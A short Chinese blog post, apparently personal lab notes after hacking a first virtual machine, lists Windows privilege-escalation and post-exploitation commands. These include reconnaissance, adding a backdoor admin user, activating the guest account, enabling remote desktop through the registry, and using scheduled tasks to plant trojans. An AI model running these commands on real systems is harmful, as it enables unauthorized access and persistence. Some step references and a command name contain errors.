soarli

Windows提权常用命令
1、whoami查看当前权限,当不是administrator或者system时需要提权2、ipconfig,查看...
扫描右侧二维码阅读全文
13
2021/05

Windows提权常用命令

成功Hacked第一台虚拟机
1、whoami查看当前权限,当不是administrator或者system时需要提权
2、ipconfig,查看服务器为内网还是外网,内网进服务器则需要转发端口
3、quser查看管理是否在线
4、systeminfo查看服务器信息及相应的补丁,可找相应的补丁提权
5、tasklist查看当前运行的进程,是否有av,可利用的第三方的服务提权等
6、net user查看用户,当发现可疑用户时,可以弱口令尝试一波,因为可能是前辈的脚印,大多数都是弱口令
7、

net user soarli secquan /add

添加一个账号为soarli密码为secquan的用户,当权限不足时或者有av拦截会提示拒绝访问然后一般会出现一个数字5
8、

net localgroup administrators soarli /add

soarli这个用户加到管理组
9、当有av拦截第5步添加用户时,可以激活guest账户

net user guest /active:yes 

,重复第6步,将guest账户提升至管理员
10、删除用户

net user secquan /del

11、查看远程桌面端口,

tasklist /svc

在输出的内容中查找svchost.exe进程下termservice服务对应的PID,在此查看的PID为:2400,查看第五步时pid2400的端口,既为远程桌面端口
12、查看远程端口或者使用注册表(REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" “Server\WinStations\RDP-Tcp /v PortNumber)set /a a=0xd3d
13、当远程桌面服务被关闭时,可以用注册表命令开启(REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f)
14、结束进程,

taskkill /im mspaint.exe

或者

taskkill /pid pid

号。结束1484这个进程

tasjkill /pid 4048

15、 netstat查看端口连接
16、set查看命令组件是否可执行
17、sc查看mysql查看服务运行权限和路径的
18、 at,定时任务,常用于域中种马

参考文章:
https://blog.csdn.net/weixin_39216626/article/details/103869243

最后修改:2021 年 05 月 13 日 08 : 18 PM

发表评论